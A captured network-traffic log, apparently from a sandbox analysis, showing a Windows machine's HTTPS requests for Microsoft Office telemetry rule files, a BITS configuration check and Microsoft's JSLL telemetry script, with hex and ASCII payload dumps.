                                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                          x-ms-request-id: ce4e00c6-401e-00a3-3516-3d8b09000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164447Z-178bfbc474b9fdhphC1NYCac0n00000004pg000000008dgm
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:47 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          60192.168.2.54978513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:49 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:49 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                          x-ms-request-id: a7625850-801e-007b-654c-3ce7ab000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164449Z-178bfbc474btvfdfhC1NYCa2en00000004ug0000000085cn
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          61192.168.2.54978413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:49 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:49 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                          x-ms-request-id: 43acaf28-701e-006f-5cf7-3cafc4000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164449Z-178bfbc474bpnd5vhC1NYC4vr400000004v000000000000y
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:49 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          62192.168.2.54978813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:49 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:49 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                          x-ms-request-id: 0a397e49-e01e-0051-357f-3b84b2000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164449Z-174c587ffdf8fcgwhC1TEBnn7000000003a000000000h14n
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          63192.168.2.54978313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:49 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:49 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                          x-ms-request-id: 90758f84-b01e-0021-4c46-3ccab7000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164449Z-178bfbc474bwh9gmhC1NYCy3rs00000004s000000000eaun
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          64192.168.2.54978913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:49 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:49 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:49 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                          x-ms-request-id: ea05e59b-301e-0033-4bf7-3cfa9c000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164449Z-178bfbc474bq2pr7hC1NYCkfgg00000004vg00000000auqt
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:49 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          65192.168.2.5497912.18.109.164443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:50 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                          2024-11-23 16:44:50 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Server: Kestrel
                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                          X-Ms-Region: prod-eus-z1
                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                          X-OSID: 2
                                                                                                                                                                                          X-CID: 2
                                                                                                                                                                                          X-CCC: GB
                                                                                                                                                                                          Cache-Control: public, max-age=233285
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:50 GMT
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          X-CID: 2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          66192.168.2.54979213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:51 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:51 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 485
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB9769355"
                                                                                                                                                                                          x-ms-request-id: 352ee399-f01e-0052-6b36-3d9224000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164451Z-174c587ffdfb485jhC1TEBmc1s00000002yg00000000hzpy
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:52 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          67192.168.2.54979413.107.246.634431708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:51 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                          Host: js.monitor.azure.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://learn.microsoft.com/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-11-23 16:44:52 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:52 GMT
                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                          Content-Length: 207935
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                          Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                          ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                          x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                                          x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                          x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          x-azure-ref: 20241123T164452Z-178bfbc474bpscmfhC1NYCfc2c000000038000000000fpkx
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache-Info: L2_T2
                                                                                                                                                                                          X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:52 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                          Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                                          Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
